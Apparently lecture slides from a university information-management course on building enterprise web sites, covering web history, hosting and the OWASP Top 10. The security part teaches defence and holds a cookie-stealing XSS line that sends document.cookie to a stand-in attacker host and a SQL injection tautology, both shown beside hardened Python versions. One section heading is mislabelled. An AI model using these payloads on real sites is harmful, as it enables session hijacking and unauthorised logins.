
Building and Managing Enterprise Web Site Services (企業網站服務之建置與管理)
Department of Information Management, National Chi Nan University
陳彥錚

Outline
- Introduction to WWW technology
- Building an enterprise web site
- WWW security

1. Introduction to WWW technology

Origins
- (1945) Vannevar Bush publishes "As We May Think" (Atlantic Monthly): the idea of the hyperlink.
- (Mar. 1989) Tim Berners-Lee, working at CERN, publishes "Information Management: A Proposal": a client/server model for a distributed hypertext system. (CERN: European Organization for Nuclear Research)

Development of WWW technology
- (1990) Tim Berners-Lee writes the first Web browser, WorldWideWeb.
- (Sep. 1993) NCSA releases the Mosaic browser. (NCSA: National Center for Supercomputing Applications)
- (Mar. 1994) Marc Andreessen and Jim Clark found Mosaic Communications Corp. (later renamed Netscape).
- (Dec. 1994) Netscape releases Netscape Navigator, which supports only HTML.

HTML and HTTP (diagram): the browser on the client PC sends (1) a request to the web server application, and the server returns (2) a response carrying the HTML document.

Browser market share: IE (49%), Firefox (43%), Google Chrome (3%), Safari, Opera. Web server market share: Apache (50%), Microsoft IIS (35%), Google GWS (6%). (Sources: wiki/Usage_share_of_web_browsers; w3schools/browsers/browsers_stats.asp)

Downloading a web page with two graphics files (diagram): the page consists of three files (the HTML document and two graphics files) but is rendered as a single page on screen. The download requires three request-response cycles: the browser downloads the HTML page first, and the tags in that page identify the other files, which are fetched in cycles 2 and 3. (Example: .tw/ycchen/www/wwwm.html)

Development of WWW technology: JavaScript
- (Dec. 1995) Netscape Navigator 2.0 supports JavaScript, a programming language that is interpreted and executed inside the browser.
- Example from the slide (the argument to document.write did not survive extraction):

    for (i = 0; i < 10; i++) document.write();
    alert("Welcome to JavaScript Test!\nSee you!");

Advantages of using JavaScript
- Validate users' input.
- Perform aggregate calculations.
- Easily prompt a user for confirmation, alerts, or pop-up information.
- Control the web browser's behaviour and the properties of HTML page components.
- Conditionalize HTML.
- Perform operations independent of server information.
- Control Dynamic HTML.
(Examples: .tw/ycchen/www/js/byExample.html, .tw/ycchen/www2000/npm.html)

Java
- (Jan. 1996) Sun releases the Java programming language.
- Java applications are compiled to bytecode and run in any environment that supports the JVM (Java Virtual Machine).
- Java applet: a small Java program that runs inside the web browser. (Screenshot: "Welcome to the campus administration automation system")

Cascading Style Sheets (CSS)
- A stylesheet language that lets a web page define its presentation, so page layout can be displayed more precisely and in a more structured way.
- Dynamic HTML: JavaScript + CSS. (Reference: w3schools/css/default.asp)
- Example from the slide:

    a  { text-decoration: none; }
    td { background-color: Ivory; }
    ul { list-style-image: url(gball.gif); }
    h2 { color: white; background-color: black; font-size: 1in; }

Other browser-side web technologies
- Browser plug-ins (add-ons): Flash (.tw/ycchen/doc1/), PDF, Windows Media Player, QuickTime.
- XML (Extensible Markup Language).
- AJAX: Asynchronous JavaScript and XML. (Screenshot of an AJAX demo; references: .zdnet.tw/news/software/0,2000085678,20215297,00.htm, chinese.engadget/2021/05/10/opera-hakon-wium-lie-and-von-tetzchner-talk-web/)

Points to note in web page design
- Balance visual design and content.
- Avoid horizontal scroll bars.
- Choose colours from the 216 web-safe colours.
- Allow for differences between browsers (JavaScript, ActiveX, CSS, ...).
- Check that hyperlinks are correct (examples of problematic links: file:///C:/www/radio.html, /xx.html).

Server-side web technology
- Common Gateway Interface (CGI): the interface between the web server and server-side application programs.
- Server-side web programming languages: ASP, JSP, Perl, PHP.
- Databases: MS SQL Server, MySQL, mSQL, Oracle.

Web Content Management Systems (CMS): Joomla! (examples: joomla123.tw, classicalvinylrepublic.tw), WordPress, Drupal, Xoops.

2. Building an enterprise web site

- Web page (program) design: static pages, Flash multimedia, dynamic web programs.
- E-commerce: membership system; payment mechanisms: credit card, ATM transfer, cash on delivery.
- Site hosting: self-hosting, virtual hosting, co-location.

Self-hosting
- Hardware: rack-mount servers, RAID disks, uninterruptible power supply.
- Software: operating system, web server program, database (e.g. XAMPP).
- Network: IP address, host domain name, external bandwidth, network security and firewall.

Virtual hosting
- The ISP rents out the hardware, software and network services needed to run a web site.
- Includes a dedicated domain name and network address, disk space, network bandwidth, support for server-side web programming languages and databases, and a back-end management interface.

Co-location
- The ISP provides machine-room space and network connectivity; enterprise customers place their own servers and network equipment there.
- IDC (Internet Data Center) services: machine-room space; network bandwidth; IP addresses; network management (traffic monitoring, fault management); network security (DDoS attack protection, virus scanning).

3. WWW security

- Web security is important for e-commerce.
- Previous studies: SSL, SET, web server security.
- Application-level security: web applications mistakenly trust data returned from a client.

OWASP: Open Web Application Security Project (Taiwan chapter: /index.php/Taiwan)

OWASP Top 10 web application security vulnerabilities (2007)
- A1. Cross-Site Scripting (XSS)
- A2. Injection Flaws: SQL injection and command injection
- A3. Malicious File Execution
- A4. Insecure Direct Object Reference
- A5. Cross-Site Request Forgery (CSRF)
- A6. Information Leakage and Improper Error Handling
- A7. Broken Authentication and Session Management
- A8. Insecure Cryptographic Storage
- A9. Insecure Communication
- A10. Failure to Restrict URL Access
(Source: OWASP Taiwan chapter; OWASP Top 10, 2007)

The Ten Most Critical Web Application Security Vulnerabilities
- Unvalidated Parameters
- Broken Access Control
- Broken Account and Session Management
- Cross-Site Scripting (XSS)
- Buffer Overflows
- Command Injection Flaws
- Error Handling Problems
- Insecure Use of Cryptography
- Remote Administration Flaws
- Web and Application Server Misconfiguration

(1) Unvalidated Parameters
Information from web requests is not validated before being used by a web application. Attackers can use these flaws to attack back-end components through the web application.

(2) Broken Access Control
Restrictions on what authenticated users are allowed to do are not properly enforced. Attackers can exploit these flaws to access other users' accounts, view sensitive files, or use unauthorized functions. (Example URL from the slide: citibank/print.asp?id=u1257)

(3) Broken Account and Session Management
Account credentials and session tokens are not properly protected. Attackers that can compromise passwords, keys, session cookies, or other tokens can defeat authentication restrictions and assume other users' identities.

(4) Cross-Site Scripting (XSS)
The web application can be used as a mechanism to transport an attack to an end user's browser. A successful attack can disclose the end user's session token, attack the local machine, or spoof content to fool the user.
XSS example (script posted to a guestbook):

    window.location = "hacker/steal.cgi?ck=" + document.cookie;

XSS web application hijack scenario (diagram: attacker, web application, victim's browser).

(5) Buffer Overflows
Web application components in some languages that do not properly validate input

can be crashed and, in some cases, used to take control of a process. These components can include CGI, libraries, drivers, and web application server components.

(6) Command Injection Flaws
Web applications pass parameters when they access external systems or the local operating system. If an attacker can embed malicious commands in these parameters, the external system may execute those commands on behalf of the web application.

SQL injection example: the login query is built by string concatenation:

    SQLQuery = "SELECT * FROM Users WHERE (UserName='" + strUN + "') AND (Password='" + strPW + "')";

With user name "fredchen" and password "199msq" the query becomes:

    SELECT * FROM Users WHERE (UserName='fredchen') AND (Password='199msq');

SQL injection: entering ' OR 'A'='A as both the user name and the password produces:

    SELECT * FROM Users WHERE (UserName='' OR 'A'='A') AND (Password='' OR 'A'='A');

Input validation

(7) Error Handling Problems
Error conditions that occur during normal operation are not handled properly. If an attacker can cause errors to occur that the web application does not handle, they can gain detailed system information, deny service, cause security mechanisms to fail, or crash the server.

(8) Insecure Use of Cryptography
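The guestbook XSS example in (4) above, worked through as an added example in Python (this is not code from the slides): a guestbook that copies entries straight into the page is shown beside one that HTML-encodes them on output, and a Set-Cookie header with the HttpOnly flag shows the second layer that keeps a session cookie out of document.cookie. The guestbook entries, the function names and the session token are all constructed for the demo.

```python
import html
from http.cookies import SimpleCookie

# Constructed guestbook entries; the second one wraps the slide's payload in a script tag.
ENTRIES = [
    "Nice site!",
    '<script>window.location="hacker/steal.cgi?ck="+document.cookie;</script>',
]


def render_unsafe(entries):
    """Vulnerable: user text is copied into the HTML unchanged, so a posted
    <script> tag is executed by every visitor's browser."""
    return "<ul>" + "".join("<li>" + e + "</li>" for e in entries) + "</ul>"


def render_escaped(entries):
    """Hardened: every entry is HTML-encoded at output time, so <, >, & and
    quotes become literal text and no markup from the entry survives."""
    return "<ul>" + "".join("<li>" + html.escape(e, quote=True) + "</li>"
                            for e in entries) + "</ul>"


def has_live_script(page):
    """Check used below: does a real <script> tag remain in the rendered page?"""
    return "<script" in page.lower()


def session_cookie_header(token):
    """Second layer: an HttpOnly cookie is not visible to document.cookie, so the
    slide's payload cannot read the session token even if a script does run;
    Secure keeps it off plain HTTP connections."""
    jar = SimpleCookie()
    jar["session"] = token
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    return jar.output(header="Set-Cookie:")


if __name__ == "__main__":
    print("unsafe page still contains a script tag:", has_live_script(render_unsafe(ENTRIES)))
    print("escaped page still contains a script tag:", has_live_script(render_escaped(ENTRIES)))
    print(render_escaped(ENTRIES))
    print(session_cookie_header("constructed-token-123"))
```

Output encoding belongs at the point where the text is written into HTML, not at input time: the same guestbook entry may later be emitted into a JavaScript string or a URL, where HTML escaping is the wrong transformation.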
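The login query in (6) above, run against a real database as an added example (Python with the standard-library sqlite3 module; this is not code from the slides). It builds the query by concatenation exactly as the slide does, then issues the same query with placeholders, so the ' OR 'A'='A input can be tried against both. The Users table and its two rows are constructed for the demo, and the plaintext Password column is kept only to mirror the slide (storing passwords in the clear is itself item A8 of the OWASP list above).

```python
import sqlite3

# Constructed sample rows; "fredchen"/"199msq" is the pair used on the slide.
USERS = [("fredchen", "199msq"), ("alice", "s3cret")]

# The slide's injection string, used as both user name and password.
TAUTOLOGY = "' OR 'A'='A"


def make_db():
    """In-memory SQLite database with a Users table like the slide's."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserName TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)", USERS)
    return conn


def login_concat(conn, str_un, str_pw):
    """Vulnerable: the query is assembled from the raw input, as on the slide.
    Returns the matching rows; any row means the login is accepted."""
    sql_query = ("SELECT * FROM Users WHERE (UserName='" + str_un +
                 "') AND (Password='" + str_pw + "')")
    return conn.execute(sql_query).fetchall()


def login_param(conn, str_un, str_pw):
    """Hardened: placeholders send the input as data, so the SQL structure is fixed
    and the quote characters in the input can never close the string literal."""
    sql_query = "SELECT * FROM Users WHERE (UserName=?) AND (Password=?)"
    return conn.execute(sql_query, (str_un, str_pw)).fetchall()


def rows_returned(login, str_un, str_pw):
    """Number of rows each login variant returns for a given input pair."""
    return len(login(make_db(), str_un, str_pw))


if __name__ == "__main__":
    print("concat, valid credentials:   ", rows_returned(login_concat, "fredchen", "199msq"))
    print("concat, tautology input:     ", rows_returned(login_concat, TAUTOLOGY, TAUTOLOGY))
    print("param,  valid credentials:   ", rows_returned(login_param, "fredchen", "199msq"))
    print("param,  tautology input:     ", rows_returned(login_param, TAUTOLOGY, TAUTOLOGY))
```

With the concatenated query the tautology input returns every row in the table, so the application "logs in" without a valid password; with placeholders the same input matches nothing, because the database looks for a user literally named ' OR 'A'='A. Input validation, the slide's next topic, is still worthwhile (for example rejecting user names outside the allowed character set), but parameterised queries are what remove the injection itself.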
